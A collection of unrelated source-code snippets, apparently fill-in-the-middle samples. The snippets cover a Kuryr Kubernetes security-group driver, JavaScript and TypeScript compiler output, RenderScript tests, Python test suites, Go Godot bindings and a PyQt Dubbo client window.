# are fully accessible. Thus, the default security group is associated.
if not sg_list:
sg_list = config.CONF.neutron_defaults.pod_security_groups
if not sg_list:
raise cfg.RequiredOptError('pod_security_groups',
cfg.OptGroup('neutron_defaults'))
return sg_list[:]
class NetworkPolicySecurityGroupsDriver(base.PodSecurityGroupsDriver):
"""Provides security groups for pods based on network policies"""
def get_security_groups(self, pod, project_id):
return _get_pod_sgs(pod, project_id)
def create_sg_rules(self, pod):
LOG.debug("Creating sg rule for pod: %s", pod['metadata']['name'])
crd_pod_selectors = []
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
i_matched, i_rules = _parse_rules('ingress', crd, pod=pod)
e_matched, e_rules = _parse_rules('egress', crd, pod=pod)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(crd, i_rules,
e_rules,
crd_selector)
crd_pod_selectors.append(crd_selector)
return crd_pod_selectors
def delete_sg_rules(self, pod):
LOG.debug("Deleting sg rule for pod: %s", pod['metadata']['name'])
pod_ip = driver_utils.get_pod_ip(pod)
if not pod_ip:
LOG.debug("Skipping SG rule deletion as pod %s has no IP assigned",
pod['metadata']['name'])
return None
crd_pod_selectors = []
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
ingress_rule_list = crd['spec'].get('ingressSgRules')
egress_rule_list = crd['spec'].get('egressSgRules')
i_matched, i_rules = _parse_rules_on_delete_pod(
ingress_rule_list, "ingress", pod_ip)
e_matched, e_rules = _parse_rules_on_delete_pod(
egress_rule_list, "egress", pod_ip)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(crd, i_rules,
e_rules,
crd_selector)
crd_pod_selectors.append(crd_selector)
return crd_pod_selectors
def update_sg_rules(self, pod):
LOG.debug("Updating sg rule for pod: %s", pod['metadata']['name'])
crd_pod_selectors = []
crd_pod_selectors.extend(self.delete_sg_rules(pod))
crd_pod_selectors.extend(self.create_sg_rules(pod))
return crd_pod_selectors
def delete_namespace_sg_rules(self, namespace):
ns_name = namespace['metadata']['name']
LOG.debug("Deleting sg rule for namespace: %s",
ns_name)
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
ingress_rule_list = crd['spec'].get('ingressSgRules')
egress_rule_list = crd['spec'].get('egressSgRules')
i_matched, i_rules = _parse_rules_on_delete_namespace(
ingress_rule_list, "ingress", ns_name)
e_matched, e_rules = _parse_rules_on_delete_namespace(
egress_rule_list, "egress", ns_name)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(
crd, i_rules, e_rules, crd_selector)
def create_namespace_sg_rules(self, namespace):
kubernetes = clients.get_kubernetes_client()
ns_name = namespace['metadata']['name']
LOG.debug("Creating sg rule for namespace: %s", ns_name)
namespace = kubernetes.get(
'{}/namespaces/{}'.format(constants.K8S_API_BASE, ns_name))
knp_crds = driver_utils.get_kuryrnetpolicy_crds()
for crd in knp_crds.get('items'):
crd_selector = crd['spec'].get('podSelector')
i_matched, i_rules = _parse_rules(
'ingress', crd, namespace=namespace)
e_matched, e_rules = _parse_rules(
'egress', crd, namespace=namespace)
if i_matched or e_matched:
driver_utils.patch_kuryrnetworkpolicy_crd(crd, i_rules,
e_rules,
crd_selector)
def update_namespace_sg_rules(self, namespace):
LOG.debug("Updating sg rule for namespace: %s",
namespace['metadata']['name'])
self.delete_namespace_sg_rules(namespace)
self.create_namespace_sg_rules(namespace)
def create_namespace_sg(self, namespace, project_id, crd_spec):
LOG.debug("Security group driver does not create SGs for the "
"namespaces.")
return {}
def delete_sg(self, sg_id):
LOG.debug("Security group driver does not implement deleting "
"SGs.")
class NetworkPolicyServiceSecurityGroupsDriver(
base.ServiceSecurityGroupsDriver):
"""Provides security groups for services based on network policies"""
def get_security_groups(self, service, project_id):
sg_list = []
svc_namespace = service['metadata']['namespace']
svc_selector = service['spec'].get('selector')
# skip is no selector
if svc_selector:
# get affected pods by svc selector
pods = driver_utils.get_pods({'selector': svc_selector},
svc_namespace).get('items')
# NOTE(ltomasbo): We assume all the pods pointed by a service
# have the same labels, and the same policy will be applied to
# all of them. Hence only considering the security groups applied
# to the first one.
if pods:
return _get_pod_sgs(pods[0], project_id)
return sg_list[:] | else: |
timer.js | function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }
function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; } |
export var Timer = // In a browser this is a number, but in node it's a NodeJS.Time (a
// class). We don't care about this difference.
function Timer(callback, timeMs) {
var _this = this;
_classCallCheck(this, Timer);
_defineProperty(this, "id", void 0);
_defineProperty(this, "callback", void 0);
_defineProperty(this, "finishTime", void 0);
_defineProperty(this, "timeRemaining", void 0);
_defineProperty(this, "pause", function () {
clearTimeout(_this.id);
_this.id = undefined;
_this.timeRemaining = (_this.finishTime || 0) - Date.now();
});
_defineProperty(this, "resume", function () {
_this.id = setTimeout(_this.finish, _this.timeRemaining);
_this.finishTime = Date.now() + (_this.timeRemaining || 0);
_this.timeRemaining = undefined;
});
_defineProperty(this, "clear", function () {
clearTimeout(_this.id);
_this.id = undefined;
_this.callback = undefined;
_this.finishTime = undefined;
_this.timeRemaining = undefined;
});
_defineProperty(this, "finish", function () {
if (_this.callback) {
_this.callback();
}
_this.clear();
});
this.id = setTimeout(this.finish, timeMs);
this.callback = callback;
this.finishTime = Date.now() + timeMs;
this.timeRemaining = undefined;
}; | |
privateNameNestedClassFieldShadowing.js | //// [privateNameNestedClassFieldShadowing.ts]
class | {
#x;
constructor() {
class Derived {
#x;
testBase(x: Base) {
console.log(x.#x);
}
testDerived(x: Derived) {
console.log(x.#x);
}
}
}
}
//// [privateNameNestedClassFieldShadowing.js]
var __classPrivateFieldGet = (this && this.__classPrivateFieldGet) || function (receiver, state, kind, f) {
if (kind === "a" && !f) throw new TypeError("Private accessor was defined without a getter");
if (typeof state === "function" ? receiver !== state || !f : !state.has(receiver)) throw new TypeError("Cannot read private member from an object whose class did not declare it");
return kind === "m" ? f : kind === "a" ? f.call(receiver) : f ? f.value : state.get(receiver);
};
var _Base_x;
class Base {
constructor() {
var _Derived_x;
_Base_x.set(this, void 0);
class Derived {
constructor() {
_Derived_x.set(this, void 0);
}
testBase(x) {
console.log(__classPrivateFieldGet(x, _Derived_x, "f"));
}
testDerived(x) {
console.log(__classPrivateFieldGet(x, _Derived_x, "f"));
}
}
_Derived_x = new WeakMap();
}
}
_Base_x = new WeakMap();
| Base |
TestFloor.rs | /*
* Copyright (C) 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, |
#pragma version(1)
#pragma rs java_package_name(android.renderscript.cts)
// Don't edit this file! It is auto-generated by frameworks/rs/api/gen_runtime.
float __attribute__((kernel)) testFloorFloatFloat(float in) {
return floor(in);
}
float2 __attribute__((kernel)) testFloorFloat2Float2(float2 in) {
return floor(in);
}
float3 __attribute__((kernel)) testFloorFloat3Float3(float3 in) {
return floor(in);
}
float4 __attribute__((kernel)) testFloorFloat4Float4(float4 in) {
return floor(in);
} | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/ |
test_installation.py | """
Role tests
"""
import os
from testinfra.utils.ansible_runner import AnsibleRunner
testinfra_hosts = AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
def test_package(host):
"""
Ensure package installed
"""
if host.system_info.distribution in ('debian', 'ubuntu'):
assert host.package('xvfb').is_installed
else:
assert host.package('xorg-x11-server-Xvfb').is_installed
def | (host):
"""
Ensure service running
"""
xvfb_service = host.service('xvfb')
assert xvfb_service.is_enabled
assert xvfb_service.is_running
def test_process(host):
"""
Ensure process running
"""
xvfb_process = host.process.get(user='root', comm='Xvfb')
assert ':99 -screen 0 1x1x24 -ac +extension GLX +render -noreset' in \
xvfb_process.args
assert len(host.process.filter(comm='Xvfb')) == 1
| test_service |
test_help_formatter.py | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import unittest
from pants.help.help_formatter import HelpFormatter
from pants.help.help_info_extracter import OptionHelpInfo
class OptionHelpFormatterTest(unittest.TestCase):
def format_help_for_foo(self, **kwargs):
ohi = OptionHelpInfo(registering_class=type(None), display_args=['--foo'],
scoped_cmd_line_args=['--foo'], unscoped_cmd_line_args=['--foo'],
typ=bool, fromfile=False, default=None, help='help for foo',
deprecated_version=None, deprecated_message=None, deprecated_hint=None,
choices=None)
ohi = ohi._replace(**kwargs)
lines = HelpFormatter(scope='', show_recursive=False, show_advanced=False,
color=False).format_option(ohi)
self.assertEquals(len(lines), 2)
self.assertIn('help for foo', lines[1])
return lines[0]
def test_format_help(self):
line = self.format_help_for_foo(default='MYDEFAULT')
self.assertEquals('--foo (default: MYDEFAULT)', line)
def test_format_help_fromfile(self):
line = self.format_help_for_foo(fromfile=True)
self.assertEquals('--foo (@fromfile value supported) (default: None)', line)
| def test_suppress_advanced(self):
args = ['--foo']
kwargs = {'advanced': True}
lines = HelpFormatter(scope='', show_recursive=False, show_advanced=False,
color=False).format_options('', '', [(args, kwargs)])
self.assertEquals(0, len(lines))
lines = HelpFormatter(scope='', show_recursive=True, show_advanced=True,
color=False).format_options('', '', [(args, kwargs)])
print(lines)
self.assertEquals(5, len(lines))
def test_format_help_choices(self):
line = self.format_help_for_foo(typ=str, default='kiwi', choices='apple, banana, kiwi')
self.assertEquals('--foo (one of: [apple, banana, kiwi] default: kiwi)', line) | |
gdnative.gen.go | package gdnative
/*------------------------------------------------------------------------------
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated. Any updates should be done in
// "types.go.tmpl" so they can be included in the generated
// code.
//----------------------------------------------------------------------------*/
/*
#cgo CFLAGS: -I../godot_headers
#include "gdnative.gen.h"
// #include <godot_headers/gdnative/gdnative.h>
// Include all headers for now. TODO: Look up all the required
// headers we need to import based on the method arguments and return types.
#include <gdnative/aabb.h>
#include <gdnative/array.h>
#include <gdnative/basis.h>
#include <gdnative/color.h>
#include <gdnative/dictionary.h>
#include <gdnative/gdnative.h>
#include <gdnative/node_path.h>
#include <gdnative/plane.h>
#include <gdnative/pool_arrays.h>
#include <gdnative/quat.h>
#include <gdnative/rect2.h>
#include <gdnative/rid.h>
#include <gdnative/string.h>
#include <gdnative/string_name.h>
#include <gdnative/transform.h>
#include <gdnative/transform2d.h>
#include <gdnative/variant.h>
#include <gdnative/vector2.h>
#include <gdnative/vector3.h>
#include <gdnative_api_struct.gen.h>
*/
import "C"
import "unsafe"
// Error is a Go wrapper for the C.godot_error enum type.
type Error int
func (e Error) getBase() C.godot_error {
return C.godot_error(e)
}
const (
Ok Error = 0 // (0)
Failed Error = 1 // < Generic fail error
ErrUnavailable Error = 2 // < What is requested is unsupported/unavailable
ErrUnconfigured Error = 3 // < The object being used hasn't been properly set up yet
ErrUnauthorized Error = 4 // < Missing credentials for requested resource
ErrParameterRangeError Error = 5 // < Parameter given out of range (5)
ErrOutOfMemory Error = 6 // < Out of memory
ErrFileNotFound Error = 7
ErrFileBadDrive Error = 8
ErrFileBadPath Error = 9
ErrFileNoPermission Error = 10 // (10)
ErrFileAlreadyInUse Error = 11
ErrFileCantOpen Error = 12
ErrFileCantWrite Error = 13
ErrFileCantRead Error = 14
ErrFileUnrecognized Error = 15 // (15)
ErrFileCorrupt Error = 16
ErrFileMissingDependencies Error = 17
ErrFileEof Error = 18
ErrCantOpen Error = 19 // < Can't open a resource/socket/file
ErrCantCreate Error = 20 // (20)
ErrQueryFailed Error = 21
ErrAlreadyInUse Error = 22
ErrLocked Error = 23 // < resource is locked
ErrTimeout Error = 24
ErrCantConnect Error = 25 // (25)
ErrCantResolve Error = 26
ErrConnectionError Error = 27
ErrCantAcquireResource Error = 28
ErrCantFork Error = 29
ErrInvalidData Error = 30 // < Data passed is invalid (30)
ErrInvalidParameter Error = 31 // < Parameter passed is invalid
ErrAlreadyExists Error = 32 // < When adding, item already exists
ErrDoesNotExist Error = 33 // < When retrieving/erasing, it item does not exist
ErrDatabaseCantRead Error = 34 // < database is full
ErrDatabaseCantWrite Error = 35 // < database is full (35)
ErrCompilationFailed Error = 36
ErrMethodNotFound Error = 37
ErrLinkFailed Error = 38
ErrScriptFailed Error = 39
ErrCyclicLink Error = 40 // (40)
ErrInvalidDeclaration Error = 41
ErrDuplicateSymbol Error = 42
ErrParseError Error = 43
ErrBusy Error = 44
ErrSkip Error = 45 // (45)
ErrHelp Error = 46 // < user requested help!!
ErrBug Error = 47 // < a bug in the software certainly happened, due to a double check failing or unexpected behavior.
ErrPrinterOnFire Error = 48 // the parallel port printer is engulfed in flames
)
// ErrorLookupMap is a string-based lookup table of constants for Error.
var ErrorLookupMap = map[string]Error{
"Ok": Ok,
"Failed": Failed,
"ErrUnavailable": ErrUnavailable,
"ErrUnconfigured": ErrUnconfigured,
"ErrUnauthorized": ErrUnauthorized,
"ErrParameterRangeError": ErrParameterRangeError,
"ErrOutOfMemory": ErrOutOfMemory,
"ErrFileNotFound": ErrFileNotFound,
"ErrFileBadDrive": ErrFileBadDrive,
"ErrFileBadPath": ErrFileBadPath,
"ErrFileNoPermission": ErrFileNoPermission,
"ErrFileAlreadyInUse": ErrFileAlreadyInUse,
"ErrFileCantOpen": ErrFileCantOpen,
"ErrFileCantWrite": ErrFileCantWrite,
"ErrFileCantRead": ErrFileCantRead,
"ErrFileUnrecognized": ErrFileUnrecognized,
"ErrFileCorrupt": ErrFileCorrupt,
"ErrFileMissingDependencies": ErrFileMissingDependencies,
"ErrFileEof": ErrFileEof,
"ErrCantOpen": ErrCantOpen,
"ErrCantCreate": ErrCantCreate,
"ErrQueryFailed": ErrQueryFailed,
"ErrAlreadyInUse": ErrAlreadyInUse,
"ErrLocked": ErrLocked,
"ErrTimeout": ErrTimeout,
"ErrCantConnect": ErrCantConnect,
"ErrCantResolve": ErrCantResolve,
"ErrConnectionError": ErrConnectionError,
"ErrCantAcquireResource": ErrCantAcquireResource,
"ErrCantFork": ErrCantFork,
"ErrInvalidData": ErrInvalidData,
"ErrInvalidParameter": ErrInvalidParameter,
"ErrAlreadyExists": ErrAlreadyExists,
"ErrDoesNotExist": ErrDoesNotExist,
"ErrDatabaseCantRead": ErrDatabaseCantRead,
"ErrDatabaseCantWrite": ErrDatabaseCantWrite,
"ErrCompilationFailed": ErrCompilationFailed,
"ErrMethodNotFound": ErrMethodNotFound,
"ErrLinkFailed": ErrLinkFailed,
"ErrScriptFailed": ErrScriptFailed,
"ErrCyclicLink": ErrCyclicLink,
"ErrInvalidDeclaration": ErrInvalidDeclaration,
"ErrDuplicateSymbol": ErrDuplicateSymbol,
"ErrParseError": ErrParseError,
"ErrBusy": ErrBusy,
"ErrSkip": ErrSkip,
"ErrHelp": ErrHelp,
"ErrBug": ErrBug,
"ErrPrinterOnFire": ErrPrinterOnFire,
}
// NewEmptyBool will return a pointer to an empty
// initialized Bool. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyBool() Pointer {
var obj C.godot_bool
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromBool will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromBool(obj Bool) Pointer {
base := obj.getBase()
return Pointer{base: unsafe.Pointer(&base)}
}
// NewBoolFromPointer will return a Bool from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewBoolFromPointer(ptr Pointer) Bool {
base := ptr.getBase()
return Bool(*(*C.godot_bool)(base))
}
// Bool is a Go wrapper for the base C.godot_bool type
type Bool bool
func (t Bool) getBase() C.godot_bool {
return C.godot_bool(t)
}
// NewEmptyInt will return a pointer to an empty
// initialized Int. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyInt() Pointer {
var obj C.godot_int
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromInt will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromInt(obj Int) Pointer {
base := obj.getBase()
return Pointer{base: unsafe.Pointer(&base)}
}
// NewIntFromPointer will return a Int from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewIntFromPointer(ptr Pointer) Int {
base := ptr.getBase()
return Int(*(*C.godot_int)(base))
}
// Int is a Go wrapper for the base C.godot_int type
type Int int
func (t Int) getBase() C.godot_int {
return C.godot_int(t)
}
// NewEmptyReal will return a pointer to an empty
// initialized Real. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyReal() Pointer {
var obj C.godot_real
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromReal will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromReal(obj Real) Pointer {
base := obj.getBase()
return Pointer{base: unsafe.Pointer(&base)}
}
// NewRealFromPointer will return a Real from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewRealFromPointer(ptr Pointer) Real {
base := ptr.getBase()
return Real(*(*C.godot_real)(base))
}
// Real is a Go wrapper for the base C.godot_real type
type Real float64
func (t Real) getBase() C.godot_real {
return C.godot_real(t)
}
// NewEmptyObject will return a pointer to an empty
// initialized Object. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyObject() Pointer {
var obj C.godot_object
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromObject will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromObject(obj Object) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewObjectFromPointer will return a Object from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewObjectFromPointer(ptr Pointer) Object {
obj := (**C.godot_object)(ptr.getBase())
return Object{base: *obj}
}
type Object struct {
base *C.godot_object
}
func (gdt Object) getBase() *C.godot_object {
return gdt.base
}
// NewEmptyMethodBind will return a pointer to an empty
// initialized MethodBind. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyMethodBind() Pointer {
var obj C.godot_method_bind
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromMethodBind will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func | (obj MethodBind) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewMethodBindFromPointer will return a MethodBind from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewMethodBindFromPointer(ptr Pointer) MethodBind {
return MethodBind{base: (*C.godot_method_bind)(ptr.getBase())}
}
type MethodBind struct {
base *C.godot_method_bind
}
func (gdt MethodBind) getBase() *C.godot_method_bind {
return gdt.base
}
// NewEmptyGdnativeApiVersion will return a pointer to an empty
// initialized GdnativeApiVersion. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyGdnativeApiVersion() Pointer {
var obj C.godot_gdnative_api_version
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromGdnativeApiVersion will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromGdnativeApiVersion(obj GdnativeApiVersion) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewGdnativeApiVersionFromPointer will return a GdnativeApiVersion from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewGdnativeApiVersionFromPointer(ptr Pointer) GdnativeApiVersion {
return GdnativeApiVersion{base: (*C.godot_gdnative_api_version)(ptr.getBase())}
}
type GdnativeApiVersion struct {
base *C.godot_gdnative_api_version
Major Uint
Minor Uint
}
func (gdt GdnativeApiVersion) getBase() *C.godot_gdnative_api_version {
return gdt.base
}
// NewEmptyGdnativeTerminateOptions will return a pointer to an empty
// initialized GdnativeTerminateOptions. This is primarily used in
// conjunction with MethodBindPtrCall.
func NewEmptyGdnativeTerminateOptions() Pointer {
var obj C.godot_gdnative_terminate_options
return Pointer{base: unsafe.Pointer(&obj)}
}
// NewPointerFromGdnativeTerminateOptions will return an unsafe pointer to the given
// object. This is primarily used in conjunction with MethodBindPtrCall.
func NewPointerFromGdnativeTerminateOptions(obj GdnativeTerminateOptions) Pointer {
return Pointer{base: unsafe.Pointer(obj.getBase())}
}
// NewGdnativeTerminateOptionsFromPointer will return a GdnativeTerminateOptions from the
// given unsafe pointer. This is primarily used in conjunction with MethodBindPtrCall.
func NewGdnativeTerminateOptionsFromPointer(ptr Pointer) GdnativeTerminateOptions {
return GdnativeTerminateOptions{base: (*C.godot_gdnative_terminate_options)(ptr.getBase())}
}
type GdnativeTerminateOptions struct {
base *C.godot_gdnative_terminate_options
InEditor Bool
}
func (gdt GdnativeTerminateOptions) getBase() *C.godot_gdnative_terminate_options {
return gdt.base
}
| NewPointerFromMethodBind |
prod.py | import subprocess
from config.directory import temp_builds
from .. import directory, output_release_file_checksum
def deploy_to_pypi() -> None:
directory.working.set_as_project_base_path()
subprocess.call(f"twine upload {temp_builds()}/*".split())
if __name__ == "__main__":
output_release_file_checksum() | deploy_to_pypi() | |
main_window.py | # -*- coding: utf-8 -*-
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QCursor
from PyQt5.QtWidgets import QVBoxLayout, QToolBar, QSplitter
from src.constant.conn_dialog_constant import ADD_CONN_MENU, EDIT_CONN_MENU
from src.constant.main_constant import LOCATION_BUTTON, TAB_ID_SEPARATOR, TREE_TOP_TEXT
from src.function.db.conn_sqlite import Connection
from src.ui.async_func.async_reopen_item import AsyncReopenManager
from src.ui.button.label_button import LabelButton
from src.ui.dialog.conn.conn_dialog import ConnDialog
from src.ui.func.common import keep_center, close_sqlite
from src.ui.func.menu_bar import fill_menu_bar
from src.ui.func.tool_bar import fill_tool_bar
from src.ui.func.tree import tree_node_factory, Context
from src.ui.tab.tab_bar import MyTabBar
from src.ui.tab.tab_widget import MyTabWidget
from src.ui.tree.my_tree import MyTreeWidget
_author_ = 'luwt'
_date_ = '2021/10/31 17:39'
class MainWindow(QtWidgets.QMainWindow):
def __init__(self, screen_rect):
super().__init__()
# 当前屏幕的分辨率大小
self.desktop_screen_rect = screen_rect
# 创建主控件,用以包含所有内容
self.main_widget = QtWidgets.QWidget()
# 主控件中的布局
self.main_layout = QVBoxLayout()
# 主部件
self.central_widget = QtWidgets.QWidget()
self.central_widget.setObjectName("central_widget")
# 主部件布局为水平布局
self.horizontalLayout = QtWidgets.QHBoxLayout(self.central_widget)
self.horizontalLayout.setObjectName("horizontalLayout")
self.main_splitter = QSplitter()
self.main_splitter.setOrientation(Qt.Horizontal)
self.main_splitter.setObjectName("main_splitter")
self.horizontalLayout.addWidget(self.main_splitter)
self.horizontalLayout.setSpacing(0)
# 左边树结构frame
self.tree_frame = QtWidgets.QFrame(self.main_splitter)
self.tree_frame.setObjectName("tree_frame")
self.tree_layout = QtWidgets.QVBoxLayout(self.tree_frame)
self.tree_layout.setObjectName("tree_layout")
self.tree_layout.setSpacing(0)
self.tree_layout.setContentsMargins(0, 0, 0, 0)
# 树顶部的工具栏
self.tree_header_widget = QtWidgets.QWidget(self.tree_frame) | self.tree_layout.addWidget(self.tree_header_widget)
self.tree_header_layout = QtWidgets.QGridLayout(self.tree_header_widget)
# 左、右、顶部边距设为0
self.tree_header_layout.setContentsMargins(0, 0, 0, self.tree_header_layout.contentsMargins().bottom())
# 树标题
self.tree_tool_header = QtWidgets.QLabel(self.tree_header_widget)
self.tree_tool_header.setText(TREE_TOP_TEXT)
self.tree_header_layout.addWidget(self.tree_tool_header, 0, 0, 1, 8)
# 定位按钮
self.tree_tool_location_button = LabelButton(self.tree_header_widget)
self.tree_tool_location_button.setObjectName("tree_tool_location_button")
# 默认不可用
self.tree_tool_location_button.setEnabled(False)
self.tree_header_layout.addWidget(self.tree_tool_location_button, 0, 8, 1, 1)
# 左边树结构
self.tree_widget = MyTreeWidget(self.tree_frame, self)
self.tree_widget.setObjectName("tree_widget")
self.tree_widget.headerItem().setHidden(True)
self.tree_layout.addWidget(self.tree_widget)
# 右边tab区frame
self.tab_frame = QtWidgets.QFrame(self.main_splitter)
self.tab_frame.setObjectName("tab_frame")
self.tab_layout = QtWidgets.QVBoxLayout(self.tab_frame)
self.tab_layout.setObjectName("tab_layout")
# 右边tab区
self.tab_widget = MyTabWidget(self.tab_frame, main_window=self)
self.tab_widget.setObjectName("tab_widget")
self.tab_bar = MyTabBar(self.tab_widget)
self.tab_bar.setObjectName("tab_bar")
self.tab_widget.setTabBar(self.tab_bar)
self.tab_layout.addWidget(self.tab_widget)
self.tab_layout.setSpacing(0)
self.tab_layout.setContentsMargins(0, 0, 0, 0)
# 菜单栏
self.menubar = QtWidgets.QMenuBar(self)
self.menubar.setObjectName("menubar")
self.setMenuBar(self.menubar)
# 工具栏
self.toolBar = QToolBar(self)
self.toolBar.setObjectName("toolBar")
self.addToolBar(Qt.TopToolBarArea, self.toolBar)
# 状态栏
self.statusbar = QtWidgets.QStatusBar(self)
self.statusbar.setObjectName("statusbar")
self.setStatusBar(self.statusbar)
self._translate = QtCore.QCoreApplication.translate
self.reopen_manager = ...
self.setup_ui()
self.translate_ui()
self.bind_action()
def setup_ui(self):
self.setObjectName("MainWindow")
self.setWindowFlags(Qt.WindowTitleHint)
# 按当前分辨率计算窗口大小
self.resize(self.desktop_screen_rect.width() * 0.65, self.desktop_screen_rect.height() * 0.7)
# 窗体居中
keep_center(self, self.desktop_screen_rect)
# 设置所有控件间距为0
self.main_layout.setSpacing(0)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_widget.setLayout(self.main_layout)
self.setCentralWidget(self.main_widget)
self.main_splitter.setStretchFactor(0, 2)
self.main_splitter.setStretchFactor(1, 9)
# 填充菜单栏
fill_menu_bar(self)
# 填充工具栏
fill_tool_bar(self)
# 设置名称显示在图标下面(默认本来是只显示图标)
self.toolBar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
self.main_layout.addWidget(self.central_widget)
def bind_action(self):
# 异步重新打开上次退出时的工作状态
self.reopen_manager = AsyncReopenManager(self, self.tree_widget, self.tab_widget)
self.reopen_manager.start()
# 双击树节点事件
self.tree_widget.doubleClicked.connect(self.get_tree_list)
# 右击事件
self.tree_widget.setContextMenuPolicy(Qt.CustomContextMenu)
self.tree_widget.customContextMenuRequested.connect(self.right_click_menu)
# tab页清除或打开tab信号
self.tab_widget.opened_tab_signal.connect(lambda: self.tree_tool_location_button.setEnabled(True))
self.tab_widget.clear_tabs_signal.connect(lambda: self.tree_tool_location_button.setEnabled(False))
# 定位
self.tree_tool_location_button.clicked.connect(self.location_method)
def connect_rest_signal(self):
# 点击、展开、收起节点,都需要让列根据内容自适应,从而可以保证水平滚动条
self.tree_widget.doubleClicked.connect(self.handle_expanded_changed)
self.tree_widget.expanded.connect(self.handle_expanded_changed)
self.tree_widget.collapsed.connect(self.handle_expanded_changed)
def translate_ui(self):
self.setWindowTitle(self._translate("MainWindow", "Dubbo-test-client"))
self.tree_tool_location_button.setText(LOCATION_BUTTON)
def add_conn(self):
"""打开添加连接窗口"""
conn_info = Connection(*((None,) * len(Connection._fields)))
conn_dialog = ConnDialog(conn_info, ADD_CONN_MENU, self.geometry(), self.tree_widget)
conn_dialog.exec()
def edit_conn(self, conn_info, tree_item):
"""打开编辑连接窗口"""
conn_dialog = ConnDialog(conn_info, EDIT_CONN_MENU, self.geometry(), tree_item=tree_item)
conn_dialog.exec()
def get_tree_list(self):
"""获取树的子节点,双击触发,连接 -> service -> method,按顺序读取出来"""
item = self.tree_widget.currentItem()
node = tree_node_factory(item)
Context(node).open_item(item, self)
def handle_expanded_changed(self, index):
# 根据当前内容决定列宽度
self.tree_widget.tree_column_resize()
item = self.tree_widget.itemFromIndex(index)
# method节点没有expanded属性,没有必要进行处理,监听conn和service节点就可以
if item.parent() is None or item.parent().parent() is None:
expanded = self.tree_widget.itemFromIndex(index).isExpanded()
self.tree_widget.update_expanded(item.text(1), expanded, item)
def right_click_menu(self, pos):
"""
右键菜单功能,实现右键弹出菜单功能
:param pos:右键的坐标位置
"""
# 获取当前元素,只有在元素上才显示菜单
item = self.tree_widget.itemAt(pos)
if item:
# 生成右键菜单
menu = QtWidgets.QMenu()
node = tree_node_factory(item)
menu_names = Context(node).get_menu_names(item, self)
[menu.addAction(QtWidgets.QAction(option, menu)) for option in menu_names]
# 右键菜单点击事件
menu.triggered.connect(lambda action: Context(node).handle_menu_func(item, action.text(), self))
# 右键菜单弹出位置跟随焦点位置
menu.exec_(QCursor.pos())
def del_history(self):
item = self.tree_widget.currentItem()
node = tree_node_factory(item)
Context(node).del_history(item, self)
def location_method(self):
tab_id = self.tab_widget.currentWidget().property("tab_id")
# 根据tab_id构造特点,逐级确定位置,根据分隔符拆分,拆分完,应该是连接id,接口名,方法名
self.tree_widget.tab_id_splits = tab_id.split(TAB_ID_SEPARATOR)
conn_id = self.tree_widget.tab_id_splits[0]
# 遍历根节点
for conn_idx in range(self.tree_widget.topLevelItemCount()):
conn_item = self.tree_widget.topLevelItem(conn_idx)
# 找到对应的连接节点,遍历
if int(conn_id) == eval(conn_item.text(2)).get("id"):
